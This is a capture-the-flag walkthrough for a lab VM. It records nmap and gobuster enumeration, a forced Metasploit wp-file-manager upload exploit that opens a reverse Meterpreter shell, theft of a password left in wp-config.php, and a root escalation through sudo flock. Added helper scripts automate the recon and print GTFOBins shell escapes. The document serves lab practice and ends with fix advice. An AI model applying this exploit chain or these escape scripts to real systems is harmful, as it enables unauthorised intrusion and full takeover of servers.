Hacking practice notes...

1. Scan the subnet:

┌──(root㉿kali)-[/home/ace]
└─# nmap -sP 192.168.56.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-26 09:22 CST
Nmap scan report for 192.168.56.1
Host is up (0.0011s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00035s latency).
MAC Address: 08:00:27:ED:07:63 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.132
Host is up (0.0021s latency).
MAC Address: 08:00:27:15:51:D4 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.127
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.46 seconds

2. Scan ports and services:

Nmap scan report for 192.168.56.132
Host is up (0.0022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
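A note on the two scans above: `nmap -sP` is the old spelling of the ping sweep, `-sn` is the current one, and the host that reports `Host is up.` with no MAC line (192.168.56.127) is the Kali box itself, which is why it is used as `lhost` later. The service scan in step 2 covered all 65535 TCP ports (`Not shown: 65533 closed tcp ports`) with version detection and default scripts. The usual way to keep that fast is a quick full-port sweep first, then `-sV -sC` only on the open ports. The script below is an added example, not part of the original write-up: it parses nmap's greppable (`-oG`) output from the sweep into the port list for the second scan. The `-oG` line is constructed to match the two open ports on this box.

```shell
#!/bin/sh
# Two-stage port recon: turn the -oG output of a fast full-port sweep
# (nmap -p- -T4 -oG - TARGET) into the -p list for a targeted -sV -sC scan.

# Constructed sample of greppable nmap output (not a real capture from the box).
SAMPLE_GNMAP=$(printf 'Host: 192.168.56.132 ()\tStatus: Up\nHost: 192.168.56.132 ()\tPorts: 80/open/tcp//http///, 33060/open/tcp//mysqlx///\tIgnored State: closed (65533)\n')

# open_ports: read -oG text on stdin, print open TCP ports as "80,33060".
# Each entry in the Ports field is port/state/proto/owner/service/rpc/version.
open_ports() {
    awk -F'Ports: ' '/Ports:/ {
        n = split($2, ports, ", ");
        for (i = 1; i <= n; i++) {
            split(ports[i], f, "/");
            if (f[2] == "open" && f[3] == "tcp") out = out (out ? "," : "") f[1];
        }
    } END { print out }'
}

# service_scan_cmd TARGET PORTS: build the follow-up nmap command line.
service_scan_cmd() {
    target=$1; ports=$2
    printf 'nmap -sV -sC -p %s %s\n' "$ports" "$target"
}

# Stand-alone demo on the constructed sample:
PORTS=$(printf '%s\n' "$SAMPLE_GNMAP" | open_ports)
service_scan_cmd 192.168.56.132 "$PORTS"
```

Against a live target, replace `SAMPLE_GNMAP` with `nmap -p- -T4 -oG - 192.168.56.132` and run the printed command; the sweep without `-sV` finishes in a fraction of the time the full version scan takes.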

3. Take a look at the web page:

[screenshot: image-20230726093906134]

It is the default Apache page again, so brute-force directories.

4. Directory brute-force:

┌──(root㉿kali)-[/home/ace]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.132
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.132
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/07/26 09:43:09 Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.132/javascript/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.132/secret/]
/server-status (Status: 403) [Size: 279]
Progress: 220225 / 220561 (99.85%)
===============================================================
2023/07/26 09:45:39 Finished
===============================================================

Have a look:

[screenshot: image-20230726094904127]

5. Scan second-level directories:

┌──(root㉿kali)-[/home/ace]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.132/secret
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.132/secret
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/07/26 09:49:26 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 328] [--> http://192.168.56.132/secret/wp-content/]
/wp-includes (Status: 301) [Size: 329] [--> http://192.168.56.132/secret/wp-includes/]
/wp-admin (Status: 301) [Size: 326] [--> http://192.168.56.132/secret/wp-admin/]
Progress: 220217 / 220561 (99.84%)
===============================================================
2023/07/26 09:52:01 Finished
===============================================================
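The two gobuster runs above are one procedure: take every directory the first run found, scan each one again, and stop recursing once something recognisable turns up (here the `wp-admin`, `wp-content`, `wp-includes` trio, which is what step 6 confirms). The script below is an added example, not part of the original write-up; it automates that loop over gobuster's output. The gobuster lines are constructed to look like the runs above, and skipping `/javascript` assumes it is the shared JavaScript alias that Debian/Ubuntu Apache installs.

```shell
#!/bin/sh
# Recurse over gobuster hits: pull every "(Status: 301)" directory out of a run,
# queue a second-level scan for each one, and detect the WordPress layout.

# Constructed gobuster output shaped like the two runs above (not a captured log).
SAMPLE_TOP='/javascript (Status: 301) [Size: 321] [--> http://192.168.56.132/javascript/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.132/secret/]
/server-status (Status: 403) [Size: 279]'
SAMPLE_SECRET='/wp-content (Status: 301) [Size: 328] [--> http://192.168.56.132/secret/wp-content/]
/wp-includes (Status: 301) [Size: 329] [--> http://192.168.56.132/secret/wp-includes/]
/wp-admin (Status: 301) [Size: 326] [--> http://192.168.56.132/secret/wp-admin/]'

# redirect_dirs: print the path of every 301 hit from gobuster output on stdin.
redirect_dirs() {
    awk '$2 == "(Status:" && $3 == "301)" { print $1 }'
}

# is_wordpress: exit 0 if the paths on stdin include wp-admin, wp-content and wp-includes.
is_wordpress() {
    awk '{ seen[$1] = 1 }
         END { exit !(("/wp-admin" in seen) && ("/wp-content" in seen) && ("/wp-includes" in seen)) }'
}

# next_scans BASE WORDLIST: emit one gobuster command per 301 directory on stdin.
# /javascript is skipped (assumed to be the Debian/Ubuntu javascript-common alias).
next_scans() {
    base=$1; wordlist=$2
    redirect_dirs | while read -r d; do
        [ "$d" = "/javascript" ] && continue
        printf 'gobuster dir -w %s -u %s%s\n' "$wordlist" "$base" "$d"
    done
}

# Stand-alone demo on the constructed samples:
printf '%s\n' "$SAMPLE_TOP" | next_scans http://192.168.56.132 /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
if printf '%s\n' "$SAMPLE_SECRET" | redirect_dirs | is_wordpress; then
    echo "WordPress under /secret: enumerate plugins and versions next"
fi
```

Once `is_wordpress` fires there is little point continuing with a generic wordlist; a WordPress-aware scanner (wpscan, or a plugin readme check) gets to the exploitable component faster.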

6. Take a look:

[screenshot: image-20230726095423137]

7. msf has a module for this; let's try it:

msf6 exploit(multi/http/wp_file_manager_rce) > set rhosts 192.168.56.132
rhosts => 192.168.56.132
msf6 exploit(multi/http/wp_file_manager_rce) > set targeturi /secret
targeturi => /secret
msf6 exploit(multi/http/wp_file_manager_rce) > set lhost 192.168.56.127
lhost => 192.168.56.127
msf6 exploit(multi/http/wp_file_manager_rce) > run

[*] Started reverse TCP handler on 192.168.56.127:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_file_manager_rce) > set ForceExploit true
ForceExploit => true
msf6 exploit(multi/http/wp_file_manager_rce) > run

[*] Started reverse TCP handler on 192.168.56.127:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
[*] 192.168.56.132:80 - Payload is at /secret/wp-content/plugins/wp-file-manager/lib/files/4obwHD.php
[*] Sending stage (39927 bytes) to 192.168.56.132
[+] Deleted 4obwHD.php
[*] Meterpreter session 1 opened (192.168.56.127:4444 -> 192.168.56.132:56156) at 2023-07-26 10:00:50 +0800

meterpreter >
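The module's built-in check gave up (`Cannot reliably check exploitability`), so the session above was obtained with `ForceExploit`. `wp_file_manager_rce` targets CVE-2020-25213, the unauthenticated file upload through the plugin's `connector.minimal.php`, fixed in wp-file-manager 6.9. Before forcing an exploit that writes a PHP file into the web root it is worth checking the plugin version by hand from its `readme.txt`, which WordPress plugins serve as a static file. The script below is an added example, not part of the original write-up or the Metasploit module: it parses the `Stable tag` line and compares it against 6.9. The readme text is constructed; the live URL in the comment assumes the `/secret` prefix seen on this box and needs curl and network access.

```shell
#!/bin/sh
# Manual version check for the bug behind msf's wp_file_manager_rce
# (CVE-2020-25213, wp-file-manager < 6.9) using the plugin's readme.txt.

# Constructed sample of a plugin readme.txt header (not captured from the box).
SAMPLE_README='=== File Manager ===
Requires at least: 4.0
Stable tag: 6.0
License: GPLv2'

# stable_tag: print the "Stable tag" version from readme.txt text on stdin.
stable_tag() {
    sed -n 's/^[Ss]table tag:[[:space:]]*//p' | head -n 1 | tr -d '\r'
}

# version_lt A B: exit 0 if dotted version A is lower than B, comparing each
# field numerically so that 6.10 is correctly above 6.9.
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".");
        n = (na > nb) ? na : nb;
        for (i = 1; i <= n; i++) {
            xi = (i in x) ? x[i] + 0 : 0; yi = (i in y) ? y[i] + 0 : 0;
            if (xi < yi) exit 0;
            if (xi > yi) exit 1;
        }
        exit 1   # equal is not less-than
    }'
}

# fm_vuln_verdict: read readme.txt on stdin, report "vulnerable (...)" when the
# stable tag is below 6.9, "patched (...)" otherwise, "unknown" if no tag found.
fm_vuln_verdict() {
    v=$(stable_tag)
    [ -n "$v" ] || { echo "unknown"; return 2; }
    if version_lt "$v" 6.9; then
        echo "vulnerable ($v < 6.9)"
    else
        echo "patched ($v)"
    fi
}

# Against the live target (assumed path from this write-up; needs curl and network):
#   curl -s http://192.168.56.132/secret/wp-content/plugins/wp-file-manager/readme.txt | fm_vuln_verdict

# Stand-alone demo on the constructed sample:
printf '%s\n' "$SAMPLE_README" | fm_vuln_verdict
```

Two caveats when the verdict is "vulnerable": the module uploads a PHP stager under `lib/files/` and deletes it afterwards (the `Deleted 4obwHD.php` line above), but the upload request and the callback still land in Apache's access log, and an operator who does not want that artefact should prefer the version check over `ForceExploit` on a target where the check fails for an unrelated reason such as a WAF.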
python3 -c "import pty;pty.spawn('/bin/bash')"
<ress/wp-content/plugins/wp-file-manager/lib/files$ export TERM=xterm
export TERM=xterm
www-data@vulny:/usr/share/wordpress/wp-content/plugins/wp-file-manager/lib/files$ ls
ls
www-data@vulny:/usr/share/wordpress/wp-content/plugins/wp-file-manager/lib/files$ cd /usr/share/wordpress
www-data@vulny:/usr/share/wordpress$ ls
ls
index.php wp-comments-post.php wp-includes wp-settings.php
readme.html wp-config-sample.php wp-links-opml.php wp-signup.php
wp-activate.php wp-config.php wp-load.php wp-trackback.php
wp-admin wp-content wp-login.php xmlrpc.php
wp-blog-header.php wp-cron.php wp-mail.php
www-data@vulny:/usr/share/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/***
* WordPress's Debianised default master config file
* Please do NOT edit and learn how the configuration works in
* /usr/share/doc/wordpress/README.Debian
***/

/* Look up a host-specific config file in
* /etc/wordpress/config-<host>.php or /etc/wordpress/config-<domain>.php
*/
$debian_server = preg_replace('/:.*/', "", $_SERVER['HTTP_HOST']);
$debian_server = preg_replace("/[^a-zA-Z0-9.\-]/", "", $debian_server);
$debian_file = '/etc/wordpress/config-'.strtolower($debian_server).'.php';
/* Main site in case of multisite with subdomains */
$debian_main_server = preg_replace("/^[^.]*\./", "", $debian_server);
$debian_main_file = '/etc/wordpress/config-'.strtolower($debian_main_server).'.php';

if (file_exists($debian_file)) {
require_once($debian_file);
define('DEBIAN_FILE', $debian_file);
} elseif (file_exists($debian_main_file)) {
require_once($debian_main_file);
define('DEBIAN_FILE', $debian_main_file);
} elseif (file_exists("/etc/wordpress/config-default.php")) {
require_once("/etc/wordpress/config-default.php");
define('DEBIAN_FILE', "/etc/wordpress/config-default.php");
} else {
header("HTTP/1.0 404 Not Found");
echo "Neither <b>$debian_file</b> nor <b>$debian_main_file</b> could be found. <br/> Ensure one of them exists, is readable by the webserver and contains the right password/username.";
exit(1);
}

/* idrinksomewater */ #### password: a credential left behind in a comment (on Debian the real DB settings live in /etc/wordpress/config-<host>.php, which this file includes above)



if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')
$_SERVER['HTTPS'] = 'on';

require_once(ABSPATH . 'wp-settings.php');
?>
www-data@vulny:/usr/share/wordpress$ su adrain
su adrain
su: user adrain does not exist
www-data@vulny:/usr/share/wordpress$ su adrian
su adrian
Password: idrinksomewater
adrian@vulny:/usr/share$ cat user.txt
cat user.txt
cat: user.txt: No such file or directory
adrian@vulny:/usr/share$ cd home
cd home
bash: cd: home: No such file or directory
adrian@vulny:/usr/share$ cd ..
cd ..
adrian@vulny:/usr$ cd ..
cd ..
adrian@vulny:/$ ls
ls
bin dev lib libx32 mnt root snap sys var
boot etc lib32 lost+found opt run srv tmp
cdrom home lib64 media proc sbin swap.img usr
adrian@vulny:/$ cd home
cd home
adrian@vulny:/home$ ls
ls
adrian
adrian@vulny:/home$ cd adrian
cd adrian
adrian@vulny:~$ ls
ls
user.txt
adrian@vulny:~$ cat user.txt
cat user.txt
HMViuploadfiles
adrian@vulny:~$ sudo -l
sudo -l
Matching Defaults entries for adrian on vulny:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on vulny:
(ALL : ALL) NOPASSWD: /usr/bin/flock
adrian@vulny:~$ sudo flock -u root /bin/bash
sudo flock -u root /bin/bash
root@vulny:/home/adrian# ls
ls
root user.txt
root@vulny:/home/adrian# cd root
cd root
bash: cd: root: Not a directory
root@vulny:/home/adrian# cd ..
cd ..
root@vulny:/home# ls
ls
adrian
root@vulny:/home# cd ..
cd ..
root@vulny:/# ls
ls
bin dev lib libx32 mnt root snap sys var
boot etc lib32 lost+found opt run srv tmp
cdrom home lib64 media proc sbin swap.img usr
root@vulny:/# cd root
cd root
root@vulny:~# ls
ls
root.txt snap
root@vulny:~# cat root.txt
cat root.txt
HMVididit
root@vulny:~#
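The escalation works because `flock` is allowed via sudo with `NOPASSWD` and simply runs whatever command follows the lock target. One side effect is visible in the transcript: `flock -u root /bin/bash` created the lock file `root` in `/home/adrian` (flock creates the target if it does not exist), which is why `ls` then shows `root user.txt` and `cd root` fails with `Not a directory`. Locking an existing path such as `/` avoids leaving that artefact. The script below is an added example, not part of the original write-up: it pulls the `NOPASSWD` binaries out of `sudo -l` output and prints the shell-spawning form for the ones with a known escape. The `sudo -l` text is constructed to mirror the box; the escape commands for `flock`, `env` and `find` are the standard GTFOBins forms.

```shell
#!/bin/sh
# Map `sudo -l` output to NOPASSWD binaries and print a shell escape for the
# ones that can spawn a shell. The flock form locks "/" (an existing path) so
# it does not drop a stray lock file the way `flock -u root ...` did above.

# Constructed `sudo -l` output mirroring the box (not a captured transcript).
SAMPLE_SUDO='Matching Defaults entries for adrian on vulny:
    env_reset, mail_badpass

User adrian may run the following commands on vulny:
    (ALL : ALL) NOPASSWD: /usr/bin/flock'

# nopasswd_bins: print each NOPASSWD binary path from `sudo -l` text on stdin,
# one per line, with any sudoers argument restrictions stripped.
nopasswd_bins() {
    sed -n 's/.*NOPASSWD:[[:space:]]*//p' \
        | tr ',' '\n' \
        | sed 's/^[[:space:]]*//; s/[[:space:]]*$//' \
        | sed 's/[[:space:]].*//'
}

# shell_via BIN: print the command that gets a root shell through BIN, or
# report that no escape is known here (exit 1).
shell_via() {
    case "$(basename "$1")" in
        flock) printf 'sudo %s -u / /bin/sh\n' "$1" ;;
        env)   printf 'sudo %s /bin/sh\n' "$1" ;;
        find)  printf 'sudo %s . -exec /bin/sh \\; -quit\n' "$1" ;;
        *)     printf '%s: no known shell escape here\n' "$1"; return 1 ;;
    esac
}

# Stand-alone demo on the constructed sample:
printf '%s\n' "$SAMPLE_SUDO" | nopasswd_bins | while read -r bin; do
    shell_via "$bin"
done
```

On a real engagement the fix is the same whichever binary is listed: `sudo` rules that hand a user an arbitrary-command runner such as `flock`, `env` or `find` are equivalent to `ALL`, so the rule should be narrowed to a wrapper script with fixed arguments or removed.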